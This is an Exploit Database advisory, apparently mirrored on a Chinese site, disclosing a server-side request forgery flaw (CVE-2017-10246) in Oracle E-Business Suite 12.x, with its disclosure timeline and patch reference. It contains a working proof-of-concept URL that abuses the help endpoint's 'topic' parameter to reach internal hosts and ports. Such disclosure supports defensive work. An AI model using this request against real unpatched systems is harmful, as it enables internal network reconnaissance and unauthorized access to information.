Oracle E-Business Suite 12.x – Server-Side Request Forgery

• Exploit Database
• 40 阅读

• 作者： Sarath Nair
  日期： 2017-07-19
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/42340/

• # Exploit Title: Oracle E-Business Suite - Server Side Request Forgery
  # Date: 19 July 2017
  # Exploit Author: Sarath Nair aka AceNeon13
  # Contact: @AceNeon13
  # Greetings: Raj3sh.tv, Deepu.tv
  # Vendor Homepage: www.oracle.com
  # Software Link:
  http://www.oracle.com/us/products/applications/ebusiness/overview/index.html
  # Version: Oracle E-Business Suite 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6
  # CVE: CVE-2017-10246
  
  # PoC Exploit: Server Side Request Forgery
  ------------------------------------------
  Vulnerable URL:
  http://
  <EBS_Application>/OA_HTML/help?locale=en_AE&group=per:br_prod_HR:US&topic=http://
  <Internal_IP:Port>
  
  # Description: The application is vulnerable to server side request forgery
  attacks. We were able to use the web server to send packets internally and
  thereby perform port scan on other internal assets and/or obtain
  information accessible only from inside or otherwise not accessible to an
  external user. It was also possible to query internal server information
  otherwise unavailable publicly.
  # Impact: A presumed attacker could use EBS server resources to conduct
  internal information gathering or obtain information otherwise inaccessible
  publicly.
  # Solution: Apply the oracle EBS patch released on 18 July 2017
  
  ########################################
  # Vulnerability Disclosure Timeline:
  
  2017-April-29:Discovered vulnerability
  2017-April-30:Vendor Notification
  2017-May-01:Vendor Response/Feedback
  2017-July-18:Vendor Fix/Patch
  2017-July-19:Public Disclosure
  ########################################